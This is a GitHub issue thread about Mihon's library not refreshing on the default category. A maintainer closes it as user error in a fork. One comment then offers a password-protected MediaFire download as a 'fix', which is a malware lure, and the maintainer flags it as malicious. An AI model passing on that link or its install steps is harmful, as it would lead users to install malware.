### ISSUE TITLE
Library not manually updating default library

### ISSUE THREAD

**Issue by fedex-bermu** [mihonapp/mihon#1183]
### Steps to reproduce

Swipe down to update on the default library. If you try the same thing on other categories it updates that category.

### Expected behavior

Library should update

### Actual behavior

Nothing happens

### Mihon version

App version: 1.8.5.6-r5683 (standard, 1925a503d, 147, 2024-09-01T03:36:35Z)

### Android version

Android version: 14 (SDK 34)

### Device

Samsung SM-S918B (dm3q)

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open or closed issue.
- [X] I have written a short but informative title.
- [X] I have gone through the [FAQ](https://mihon.app/docs/faq/general) and [troubleshooting guide](https://mihon.app/docs/guides/troubleshooting/).
- [X] I have updated the app to version **[0.16.5](https://github.com/mihonapp/mihon/releases/latest)**.
- [X] I have updated all installed extensions.
- [X] I will fill out all of the requested information in this form.

**Comment by Smol-Ame** [comment]
1) You're using Yokai, make issue requests on Yokai GitHub instead
2) Check your Library Settings, maybe you're excluding something, update restriction, or it's skipping unnecessary updates to reduce load/requests sent to sources. Otherwise, maybe source/extension-related issue.

Anyways, closing since it's not Mihon & probably just user error

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Smol-Ame** [comment]
Do not download the file above, it is malicious.
